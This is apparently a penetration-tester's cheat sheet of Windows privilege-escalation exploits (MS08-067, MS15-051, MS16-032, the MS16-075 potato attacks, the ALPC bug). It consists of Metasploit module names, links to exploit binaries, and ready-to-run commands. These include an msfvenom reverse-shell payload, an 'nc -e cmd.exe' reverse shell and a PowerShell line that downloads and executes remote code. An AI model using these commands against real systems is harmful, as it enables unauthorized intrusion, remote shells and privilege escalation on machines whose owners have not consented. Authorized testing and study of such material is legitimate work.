Exploits

Bypass UAC

https://github.com/hfiref0x/UACME

MS08-067

exploit/windows/smb/ms08_067_netapi
https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
msfvenom -p windows/shell_reverse_tcp LHOST=<ip> LPORT=<port> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows
python MS08_067_2018.py
python MS08_067_2018.py <ip> <scenario_number> <port>

MS15-051

exploit/windows/local/ms15_051_client_copy_image

x32

https://github.com/rootphantomer/exp/blob/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/Win32/ms15-051.exe

x64 https://github.com/rootphantomer/exp/raw/master/ms15-051%EF%BC%88%E4%BF%AE%E6%94%B9%E7%89%88%EF%BC%89/ms15-051/ms15-051/x64/ms15-051.exe

ms15-051.exe "nc <ip> <port> -e cmd.exe"

MS16-032

exploit/windows/local/ms16_032_secondary_logon_handle_privesc

https://gist.github.com/intrd/6dda33f61dca560e6996d01c62203374

powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('<url>');Invoke-MS16-032 '-nop -exec bypass -c <command>'

MS16-075

HotPotato - Tater

Start and stop

Import-Module .\Tater.ps1

[press enter while script running]
Stop-Tater

On W7 and W2008 R2
NBNS WPAD Bruteforce + Windows Defender Signature Updates

Invoke-Tater -Trigger 1 -Command "<cmd>"

Using WPAD Bruteforce + Windows Defender Signature Updates and UDP port exhaustion

Invoke-Tater -ExhaustUDP y -Command "<cmd>"

On W10
WebClient Service + Scheduled Task

Invoke-Tater -Trigger 2 -Command "<cmd>"

RottenPotato

exploit/windows/local/ms16_075_reflection

https://github.com/breenmachine/RottenPotatoNG/tree/master/RottenPotatoEXE/x64/Release

JuicyPotato

exploit/windows/local/ms16_075_reflection_juicy
https://github.com/ohpe/juicy-potato/releases
jp.exe -t * -p <rsh.exe> -l <unused_port_like_9001>

ALPC bug

Ressources

https://hunter2.gitbook.io/darthsidious/privilege-escalation/alpc-bug-0day

MSF
exploit/windows/local/alpc_taskscheduler
Exploit (09/2018)

Download the zip below:

CFF

The exploit may be patch to work on other systems than W10/W2016, but works only on x64.

CVE-2019-3567

https://offsec.provadys.com/osquery-windows-acl-misconfiguration-eop.html